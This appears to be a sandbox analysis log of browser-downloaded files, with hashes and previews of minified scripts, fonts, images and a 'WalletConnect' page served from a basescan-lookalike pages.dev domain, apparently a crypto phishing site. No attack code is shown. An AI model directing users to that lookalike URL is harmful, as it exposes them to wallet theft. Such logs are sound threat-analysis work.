                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/account2/assets/toNumber-2a781ab2.js
                                                                                                                                                                                                                                              Preview:import{b as s,i as e}from"./isObject-010a5422.js";import{i as f}from"./isObjectLike-e68f0fe0.js";var o="[object Symbol]";function c(r){return typeof r=="symbol"||f(r)&&s(r)==o}var m=/\s/;function b(r){for(var t=r.length;t--&&m.test(r.charAt(t)););return t}var a=/^\s+/;function p(r){return r&&r.slice(0,b(r)+1).replace(a,"")}var n=0/0,y=/^[-+]0x[0-9a-f]+$/i,I=/^0b[01]+$/i,d=/^0o[0-7]+$/i,x=parseInt;function j(r){if(typeof r=="number")return r;if(c(r))return n;if(e(r)){var t=typeof r.valueOf=="function"?r.valueOf():r;r=e(t)?t+"":t}if(typeof r!="string")return r===0?r:+r;r=p(r);var i=I.test(r);return i||d.test(r)?x(r.slice(2),i?2:8):y.test(r)?n:+r}export{j as t};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (42824)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):42825
                                                                                                                                                                                                                                              Entropy (8bit):4.9651537307862
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:iU1CfxCfLzjlICfL4mCCfLhjCfLKDCfLzjljCfL4dCfLhLCfLKWefLpfQJpd+7uw:h1Cf8nwucf8uq5cSho/odN
                                                                                                                                                                                                                                              MD5:B8E6925257193D93B862DDB73E4D164D
                                                                                                                                                                                                                                              SHA1:09A95815CE720A622E05038E048CD5FF0417DD83
                                                                                                                                                                                                                                              SHA-256:5B5C2F98F02CC4649776756F42AA3CEC6B2FC3721842887034133564B947BCEF
                                                                                                                                                                                                                                              SHA-512:DF3BBB7FFECD2508842D76E394FBB09238FEA2012E43CAEB37B9BDDB2EFF61A1F052F69BC61874A73DD495907FE34D979DAD6B22B88C376DF17A6B840A67A602
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var k=async(A={},I)=>{let E;if(I.startsWith("data:")){const g=atob(I.replace(/^data:.*?base64,/,"")),C=new Uint8Array(g.length);for(let D=0;D<g.length;D++)C[D]=g.charCodeAt(D);E=await WebAssembly.instantiate(C,A)}else{const g=await fetch(I),C=g.headers.get("Content-Type")||"";if("instantiateStreaming"in WebAssembly&&C.startsWith("application/wasm"))E=await WebAssembly.instantiateStreaming(g,A);else{const D=await g.arrayBuffer();E=await WebAssembly.instantiate(D,A)}}return E.instance.exports},S=A=>k(A,"data:application/wasm;base64,AGFzbQEAAAABjgEVYAJ/fwF/YAN/f38Bf2ACf38AYAN/f38AYAR/f39/AGABfwBgBX9/f39/AX9gBX9/f39/AGAEf39/fwF/YAF/AX9gAX8BfmAAAGAAAXxgBn9/f39/fwBgBn9/f39/fwF/YAV/f35/fwBgBH9+f38AYAV/f31/fwBgBH99f38AYAV/f3x/fwBgBH98f38AAlMCEC4vd3JfdXRpbHNfYmcuanMaX193Ymdfbm93XzljNTk5MGJkYTA0YzdlNTMADBAuL3dyX3V0aWxzX2JnLmpzEF9fd2JpbmRnZW5fdGhyb3cAAgNiYQMCAQACAwYBBgIDAAcDBAMAAwcDAwIHBAQABAIAAAUDBAQCAgYNAAACBQMBAQULAgYAAggCAgUOBw8RBhMEBQEFAwgDAAAAAAACAAMAAAMCAAkACwMCAQEBAAkACQoKCgUEBQFwATQ0BQMB
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (1238)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1239
                                                                                                                                                                                                                                              Entropy (8bit):5.068464054671174
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:ch63Cf5W8QPIHRZ3hwVFS39bYGwNef1yTZsNUkQ1sZmSuLqNWRco5Jcn5IKM6cuY:C6SQnw/x+SR8ZZkQbp1RZ5JwiKMm7Zc
                                                                                                                                                                                                                                              MD5:9E8F56E8E1806253BA01A95CFC3D392C
                                                                                                                                                                                                                                              SHA1:A8AF90D7482E1E99D03DE6BF88FED2315C5DD728
                                                                                                                                                                                                                                              SHA-256:2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
                                                                                                                                                                                                                                              SHA-512:63F0F6F94FBABADC3F774CCAA6A401696E8A7651A074BC077D214F91DA080B36714FD799EB40FED64154972008E34FC733D6EE314AC675727B37B58FFBEBEBEE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:!function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href")||""}function r(e,t){var r=e.substr(t,2);return parseInt(r,16)}function n(n,c){for(var o="",a=r(n,c),i=c+2;i<n.length;i+=2){var l=r(n,i)^a;o+=String.fromCharCode(l)}try{o=decodeURIComponent(escape(o))}catch(u){e(u)}return t(o)}function c(t){for(var r=t.querySelectorAll("a"),c=0;c<r.length;c++)try{var o=r[c],a=o.href.indexOf(l);a>-1&&(o.href="mailto:"+n(o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelectorAll("template"),n=0;n<r.length;n++)try{i(r[n].content)}catch(c){e(c)}}function i(t){try{c(t),o(t),a(t)}catch(r){e(r
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 2760, version 0.0
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2760
                                                                                                                                                                                                                                              Entropy (8bit):7.672875520952282
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:1Z2QTKffeOQx8htCstTVeXOO7a9uYvk8fJ7sxJQWNsX:1Z2fwCh0wTVfgaFvnsfQWNsX
                                                                                                                                                                                                                                              MD5:40A960183DC62E1C81FFFABD9A45B28E
                                                                                                                                                                                                                                              SHA1:4B8D19C1B996061A75523A5BDD0DFCB04391140C
                                                                                                                                                                                                                                              SHA-256:B1AC755E55E54AD8EBC9710F7CF363191ECDD01025CCC4D4D94761CB0BA5C1CD
                                                                                                                                                                                                                                              SHA-512:AE17D54DCD84F0F78A4CB18CC1F461A06F0E78A19DED6EB62A9E71555E96CDE46AFEBCAD2BF62DA3BED3BD0B22820B07AF7C6C8FA60ADC91BD4608473C3462B0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/avertastd-mono-extrabold-B9YLCmbh.woff
                                                                                                                                                                                                                                              Preview:wOFF........................................GDEF.......,.....E.GGPOS... ...o.......GSUB.......5...6....OS/2.......M...`m.m.cmap...T...D...T....gasp................glyf...D.......L.OQ[head...d...6...6*C..hhea...........$....hmtx.......E...TN8..loca...<...'...,.x..maxp........... .Z.4name...........59...post.......>...O.6S.x.=.}L[U......[....5nA.c..1....h.....u....U..R>6.l..h.4uY..f....%...(....?...f!U...CD.j ...o=....q.M....<'...B..D#<..F.......q..S/-. ....]....)..h..@k.R.b.Y4.....D#x..A..H.a...t.j.}5{...4...........XxR..u..fI....f.5cSJ...%..(Mv..E3.DTy.......A..k...c...h..!8=9>......:.m ...I...S..K|...H..n....]...9.'@..n.49.bND....|...J..w.]4....e.-wW...r..z..s_<.~.......Dw~...k.dW.M...U;...K.*o!.u.R..z..N......v.+J..r../.7.R..1.J..i.........)E.....T....*/gH[.O|...........q..F....S.F..Y..w...!..@43&L/......>rs.N....>.s0'.u..d.'<.5iy.J....?.=Lc_D.u.lz3.}....C1.eB...)Z..k|{K*r^`wi*..S.q.6E?..(k'2..$w.vm<*.6...r...'rh..4;......nc....b[..I.d...C..B..Q...v..YW:j.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2395)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9562
                                                                                                                                                                                                                                              Entropy (8bit):5.071017232434546
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:jiep/uRmNKzej7JsEXfdxbx7x7bX7fcCB1jWIRtD0w:3pmR0KzYzcmww
                                                                                                                                                                                                                                              MD5:4073A2CB091535231AF102FBBBABC018
                                                                                                                                                                                                                                              SHA1:4F1291A93B5435E388C67B3A379AF43CE39DD11B
                                                                                                                                                                                                                                              SHA-256:34F48CAA372038829B9D8B64CBAD1F9F29C5F8CA6ED3B85958C2A78954D06F77
                                                                                                                                                                                                                                              SHA-512:82799234927964F2883DB398027D068DCC3D6CE6DB67E05DF6E2F23159337D46D17AD0C8D4543DFB45FBB5E1EFE5B5BE508D3D19842A8939ED9782477028859D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/js/components/hs.unfold.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';$.HSCore.components.HSUnfold={_baseConfig:{unfoldEvent:'click',unfoldType:'simple',unfoldDuration:300,unfoldEasing:'linear',unfoldAnimationIn:'fadeIn',unfoldAnimationOut:'fadeOut',unfoldHideOnScroll:true,unfoldHideOnBlur:false,unfoldDelay:350,unfoldOpenedElement:'init',afterOpen:function(invoker){},beforeClose:function(invoker){},afterClose:function(invoker){}},_pageCollection:$(),init:function(collection,config){var self;if(!collection||!collection.length)return;self=this;var fieldsQty;collection.each(function(i,el){var $this=$(el),itemConfig;if($this.data('HSUnfold'))return;itemConfig=config&&$.isPlainObject(config)?$.extend(true,{},self._baseConfig,config,$this.data()):$.extend(true,{},self._baseConfig,$this.data());switch(itemConfig.unfoldType){case 'css-animation':$this.data('HSUnfold',new UnfoldCSSAnimation($this,itemConfig));break;case 'jquery-slide':$this.data('HSUnfold',new UnfoldJSlide($this,itemConfig));break;default:$this.data('HSUnfold',new Unfol
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (679)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                                              Entropy (8bit):4.969608273824473
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:9EAXsCEPGxSfLZudG+MtI+pwm+Rbet2AZ3gt/JQ/Z/FYoLUQD9M/1/Dn:9TsC4vZuOK+pwdRK8MgRJQdFYBQu/1/D
                                                                                                                                                                                                                                              MD5:D00FDBE0A6C7E81D73ADB155CB05FFAE
                                                                                                                                                                                                                                              SHA1:443C65F821F6CD6ABAFE72BCBBC3BBA70333B98A
                                                                                                                                                                                                                                              SHA-256:0369FE7001FC110E894904BA8050B4168BC8EB3F284FA090268780B10194B9F4
                                                                                                                                                                                                                                              SHA-512:5CD0BE7C6F0232DD375D929886F379A6A935C89D1EFE0F68A12E09FB43E32895F64017CC3DAE68C14A9D6C9039A774A732936555EDC046A5BDA885A58DABF32B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';$.HSCore.components.HSMalihuScrollBar={_baseConfig:{scrollInertia:150,theme:'minimal-dark'},_pageCollection:$(),init:function(collection,config){if(!collection||!collection.length)return;var self=this;config=config&&$.isPlainObject(config)?$.extend(true,{},config,this._baseConfig):this._baseConfig;return collection.each(function(i,el){var $this=$(el),scrollBar,scrollBarThumb,itemConfig=$.extend(true,{},config,$this.data());$this.mCustomScrollbar(itemConfig);scrollBar=$this.find('.mCSB_scrollTools');scrollBarThumb=$this.find('.mCSB_dragger_bar');if(scrollBar.length&&$this.data('scroll-classes')){scrollBar.addClass($this.data('scroll-classes'));}.if(scrollBarThumb.length&&$this.data('scroll-thumb-classes')){scrollBarThumb.addClass($this.data('scroll-thumb-classes'));}.self._pageCollection=self._pageCollection.add($this);});},destroy:function(collection){if(!collection&&!collection.length)return $();var _self=this;return collection.each(function(i,el){var $this=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):332
                                                                                                                                                                                                                                              Entropy (8bit):7.123985667885642
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:6v/lhPUaKdEKlMip8J6ovbqOKlBF9op7y6Zn61o8AYqAV5WZ4xIjrRitdp:6v/7T2TAJTvbCbFWJy6ZuP5WHotz
                                                                                                                                                                                                                                              MD5:6099F0962C729F720E6A9F47BF0AA090
                                                                                                                                                                                                                                              SHA1:70A10051F9B89962217DE4C523205D636D96DE3B
                                                                                                                                                                                                                                              SHA-256:E26A0013BEBE385934B5E1C634A1534EB70982152C11250C4C187B14D20D86D8
                                                                                                                                                                                                                                              SHA-512:020AFC1B88DE164BB8F4408324EB69B38971A10E1283698FD85657AE56D48366F523C61AF5C7C4B110BC52308B835DA1D8F5474CBA8DB2D6A519B2AB0784FE27
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.....................IDATx..K.a.......!..)ijh....".........I..Yq..AE\...]D.'.E._.....w..g...s....m.......$...kwA.c.....C.....P..JH...-.x...y.Q.g.....#&v.h.]B.$...c...Q.."....r.:PBR.....(...hB...\.?...k..&~...8.D...1j..#...[.`.c1....{s.o,..!,c.;...4..R8..D..C..~.g{x......f..d.ox.n....V.7.x.....IEND.B`.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):332
                                                                                                                                                                                                                                              Entropy (8bit):7.123985667885642
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:6v/lhPUaKdEKlMip8J6ovbqOKlBF9op7y6Zn61o8AYqAV5WZ4xIjrRitdp:6v/7T2TAJTvbCbFWJy6ZuP5WHotz
                                                                                                                                                                                                                                              MD5:6099F0962C729F720E6A9F47BF0AA090
                                                                                                                                                                                                                                              SHA1:70A10051F9B89962217DE4C523205D636D96DE3B
                                                                                                                                                                                                                                              SHA-256:E26A0013BEBE385934B5E1C634A1534EB70982152C11250C4C187B14D20D86D8
                                                                                                                                                                                                                                              SHA-512:020AFC1B88DE164BB8F4408324EB69B38971A10E1283698FD85657AE56D48366F523C61AF5C7C4B110BC52308B835DA1D8F5474CBA8DB2D6A519B2AB0784FE27
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/images/gen/bcgame_20a.png
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.....................IDATx..K.a.......!..)ijh....".........I..Yq..AE\...]D.'.E._.....w..g...s....m.......$...kwA.c.....C.....P..JH...-.x...y.Q.g.....#&v.h.]B.$...c...Q.."....r.:PBR.....(...hB...\.?...k..&~...8.D...1j..#...[.`.c1....{s.o,..!,c.;...4..R8..D..C..~.g{x......f..d.ox.n....V.7.x.....IEND.B`.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):331
                                                                                                                                                                                                                                              Entropy (8bit):7.085524417422163
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:6v/lhPUedEmyP983MaQjlBAKcjtyB8qp3PgpDj1dXFJjniknfAlbp:6v/7bflMD/AByXp3Pgp/vVJ2knfC
                                                                                                                                                                                                                                              MD5:C678260FE34FD3A3ABDD8AC5247D96C0
                                                                                                                                                                                                                                              SHA1:8224E46B5F8BA0174821930AA9EFFDFAAF3725E0
                                                                                                                                                                                                                                              SHA-256:E660B93234F23E254D479799132372CC9D39F54EA17B95DC066E22E47D1E2EE2
                                                                                                                                                                                                                                              SHA-512:4DF7831587686EC2CA110EEAEE955CF4F57874662085CDB6623F6425B9C68C0D14FB38C71937F94C84F8EC61D9633B79A47E8E3B2A429BFD87551A381B668D47
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.....................IDATx..K.a.....S.#............H(j...ko..&..f.!...h..D....E.......p...y.Y........c6q.k.&.E$.......n..|..#....I.E|C./...FxB6N..w..O.uq.%....m..v9w.X..QW.SW...R...T..Q.`..K...XE..'X.8.......=<.....:.'jT.JH.Mm...Yt..c..f...B..|3..{.@.@......w...Q.N......XM..K.L...Xv..{vqBE......IEND.B`.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 100x133, components 3
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2593
                                                                                                                                                                                                                                              Entropy (8bit):7.344045929921163
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:Ull06uETA0fPoVxP+rm9AOFT71RwhTmwaaNoUamtDblR:U0ETQxP+q9pD2awa1yDz
                                                                                                                                                                                                                                              MD5:52D01DF0A261E55811E4F5000DC3392C
                                                                                                                                                                                                                                              SHA1:2AA6D3B3BEF6C0D2BF303258940F371FF9B74C51
                                                                                                                                                                                                                                              SHA-256:8EEACC3F73088BCEE5593CBC86793E797FEEC0F287C323856CDA51DEA872F111
                                                                                                                                                                                                                                              SHA-512:09BB82C3D0B49F4B3C369DBDA2D8CD8DDBD995DE75FBB08BF0781E8BBD82AF262F7744A9A55CC267D933364F4A3258E0BEE2926B17EAD446584E6F5C8BF8E2AF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:......JFIF.....H.H......ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0........................................................#...#*%%*525EE\..................................................#...#*%%*525EE\........d.."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B....
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:MS Windows icon resource - 1 icon, 48x48, 32 bits/pixel
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9662
                                                                                                                                                                                                                                              Entropy (8bit):4.505004206620478
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:9OjuVwnSo5xPa/fAtw1AChAH7VmkYeL3OClhUl3Ih8nF1TEaLgDl:EyVSZLqWR5mAL+Crs4Uwj
                                                                                                                                                                                                                                              MD5:4EECAB98EAF2BFCE5A68DCF99CDAA71F
                                                                                                                                                                                                                                              SHA1:998E739D37CF1B5C0A884F20E855582625722435
                                                                                                                                                                                                                                              SHA-256:FA9813D70408D46DED45AC4ADA5153A88EA4F5619B16A876CE2BC12190D093C0
